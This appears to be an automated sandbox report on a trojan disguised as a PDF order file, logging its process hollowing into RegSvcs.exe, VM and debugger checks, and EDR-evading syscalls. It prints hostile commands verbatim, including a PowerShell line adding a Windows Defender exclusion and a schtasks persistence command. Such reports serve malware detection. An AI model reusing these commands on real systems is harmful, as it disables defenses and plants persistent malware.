Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97484
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97370
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97247
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97125
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97016
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96797
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96680
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96563
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96453
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96313
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96161
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96028
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95796
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95681
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95563
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95442
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95327
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95217
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95094
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94749
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94636
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94516
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94382
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94279
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94167
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94016
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93899
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99863
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99625
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msdtc.exe	Thread delayed: delay time: 60000

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: Spectrum.exe, 0000002C.00000003.2979725621.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^=h
Source: SensorDataService.exe, 0000002A.00000002.3052030363.000000000060F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device)
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5fSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00l7f5f
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1816866033.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1802330487.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1733869646.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1705620612.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1847187399.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1784297308.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1711099156.000000000066E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2306696013.000000000066E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LfSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: AppVClient.exe, 00000006.00000003.1690113287.0000000000457000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000002.1690839357.000000000046E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000006.00000003.1690017677.0000000000450000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: surmit.exe, 0000001C.00000003.1878527227.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000002C.00000003.2979725621.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nhSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: surmit.exe, 00000007.00000002.1724640773.0000000000D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWbJ(*
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Device
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~
Source: Spectrum.exe, 0000002C.00000003.2979725621.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00<ph
Source: wscript.exe, 00000018.00000002.1818738093.0000019BF2554000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Spectrum.exe, 0000002C.00000003.2979725621.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1695174150.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,w
Source: Spectrum.exe, 0000002C.00000003.2979725621.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk DeviceR
Source: surmit.exe, 0000001C.00000002.1902984472.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8945d8837dd8007502eb33837df000740a8b45f050ff9578ffffff837df800740e68008000006a008b4df851ff558cc745dc0000000033d20f8588feffff837ddc007440837df000740a8b45f050ff9578ffffff837df400740e68008000006a008b4df451ff558c837df800740e68008000006a008b55f852ff
Source: SensorDataService.exe, 0000002A.00000003.2950268193.0000000000657000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: es.Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver3e97-fcac-730a-8cb
Source: SensorDataService.exe, 0000002A.00000003.2950012014.0000000000648000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00456AAF BlockInput,

0_2_00456AAF

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00433920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00433920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE1130 mov eax, dword ptr fs:[00000030h]	0_2_00BE1130
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C23F3D mov eax, dword ptr fs:[00000030h]	0_2_00C23F3D
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00DFB3C8 mov eax, dword ptr fs:[00000030h]	0_2_00DFB3C8
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00DFC9E8 mov eax, dword ptr fs:[00000030h]	0_2_00DFC9E8
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00DFCA48 mov eax, dword ptr fs:[00000030h]	0_2_00DFCA48
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00AD1130 mov eax, dword ptr fs:[00000030h]	7_2_00AD1130
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B13F3D mov eax, dword ptr fs:[00000030h]	7_2_00B13F3D
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00CF81C8 mov eax, dword ptr fs:[00000030h]	7_2_00CF81C8
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00CF8228 mov eax, dword ptr fs:[00000030h]	7_2_00CF8228
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00CF6BA8 mov eax, dword ptr fs:[00000030h]	7_2_00CF6BA8
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_00C37A78 mov eax, dword ptr fs:[00000030h]	25_2_00C37A78
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_00C363F8 mov eax, dword ptr fs:[00000030h]	25_2_00C363F8
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_00C37A18 mov eax, dword ptr fs:[00000030h]	25_2_00C37A18
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02B91130 mov eax, dword ptr fs:[00000030h]	25_2_02B91130
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BD3F3D mov eax, dword ptr fs:[00000030h]	25_2_02BD3F3D
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_00BA7D98 mov eax, dword ptr fs:[00000030h]	28_2_00BA7D98
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_00BA7DF8 mov eax, dword ptr fs:[00000030h]	28_2_00BA7DF8
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_00BA6778 mov eax, dword ptr fs:[00000030h]	28_2_00BA6778
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03001130 mov eax, dword ptr fs:[00000030h]	28_2_03001130
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03043F3D mov eax, dword ptr fs:[00000030h]	28_2_03043F3D

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0043B1CC GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,

0_2_0043B1CC

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00428189 SetUnhandledExceptionFilter,	0_2_00428189
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004281AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004281AC
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C21361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C21361
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C24C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C24C7B
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00B11361
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00B14C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BD1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_02BD1361
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BD4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_02BD4C7B
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_03041361
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_03044C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQuerySystemInformation: Indirect: 0x9B8462	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtAdjustPrivilegesToken: Indirect: 0x9B864C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 490000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2D7008			Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A45008

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0043B106 LogonUserW,

0_2_0043B106

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00403D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403D19

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0044411C SendInput,keybd_event,

0_2_0044411C

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_004474E7 mouse_event,

0_2_004474E7

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user\AppData\Local\Temp\server02.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\surmit.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\bothsided\surmit.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user\AppData\Local\Temp\TrojanAI.exe"

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0043A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0043A66C

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_004471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_004471FA

Source: Order SMG 201906 20190816order.pdf.scr.exe	Binary or memory string: Shell_TrayWnd
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmp, Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1687663598.00000000042ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server02.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
